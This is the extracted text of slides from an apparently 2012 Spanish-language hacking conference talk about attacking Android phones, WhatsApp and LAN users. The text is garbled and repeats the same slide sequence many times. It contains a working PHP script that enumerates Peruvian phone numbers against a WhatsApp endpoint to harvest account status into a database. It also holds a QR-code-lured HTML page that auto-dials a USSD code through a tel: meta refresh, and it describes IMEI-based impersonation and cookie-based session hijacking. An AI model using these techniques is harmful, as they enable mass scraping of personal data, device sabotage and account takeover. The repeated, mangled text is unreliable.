bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Requisitos
bull Tener el Android rooteado (super privilegios) Todas las herramientas interesantes requieren de super-privilegios
bull Analizar la mejor situacioacuten para realizar un ataque
bull Utiliza tu ldquoAndroidrdquo es un gran amigo
Atacando Windows
Tool Anti (Android Network Toolkit)
httpwwwzimperiumcom
Con Anti podemos
Buscar vulnerabilidades
Auditoriacutea de passwords
Ataques de man in the middle
Ejecutar comandos en el SO
Descubrir traacutefico inseguro en la red
Atacando Windows
Atacando Windows
USO DE NMAP
SCANEO DE PUERTOS
DETECCIOacuteN DE SIST OPERATIVO
SCRIPT DE VERIFICACIOacuteN DE
VULNERABILIDADES
Atacando Windows
Atacando una red LAN
bull Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook Hotmail Twitter)
bull El coacutedigo fuente es libre httpdroidsheepde
bull Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear WTF
bull La comunidad XDA-developers sigue sacando nuevas versiones del software (httpforumxda-developerscom)
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Atacando Windows
Tool Anti (Android Network Toolkit)
httpwwwzimperiumcom
Con Anti podemos
Buscar vulnerabilidades
Auditoriacutea de passwords
Ataques de man in the middle
Ejecutar comandos en el SO
Descubrir traacutefico inseguro en la red
Atacando Windows
Atacando Windows
USO DE NMAP
SCANEO DE PUERTOS
DETECCIOacuteN DE SIST OPERATIVO
SCRIPT DE VERIFICACIOacuteN DE
VULNERABILIDADES
Atacando Windows
Atacando una red LAN
bull Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook Hotmail Twitter)
bull El coacutedigo fuente es libre httpdroidsheepde
bull Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear WTF
bull La comunidad XDA-developers sigue sacando nuevas versiones del software (httpforumxda-developerscom)
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Atacando Windows
Atacando Windows
USO DE NMAP
SCANEO DE PUERTOS
DETECCIOacuteN DE SIST OPERATIVO
SCRIPT DE VERIFICACIOacuteN DE
VULNERABILIDADES
Atacando Windows
Atacando una red LAN
bull Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook Hotmail Twitter)
bull El coacutedigo fuente es libre httpdroidsheepde
bull Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear WTF
bull La comunidad XDA-developers sigue sacando nuevas versiones del software (httpforumxda-developerscom)
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Atacando Windows
USO DE NMAP
SCANEO DE PUERTOS
DETECCIOacuteN DE SIST OPERATIVO
SCRIPT DE VERIFICACIOacuteN DE
VULNERABILIDADES
Atacando Windows
Atacando una red LAN
bull Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook Hotmail Twitter)
bull El coacutedigo fuente es libre httpdroidsheepde
bull Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear WTF
bull La comunidad XDA-developers sigue sacando nuevas versiones del software (httpforumxda-developerscom)
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
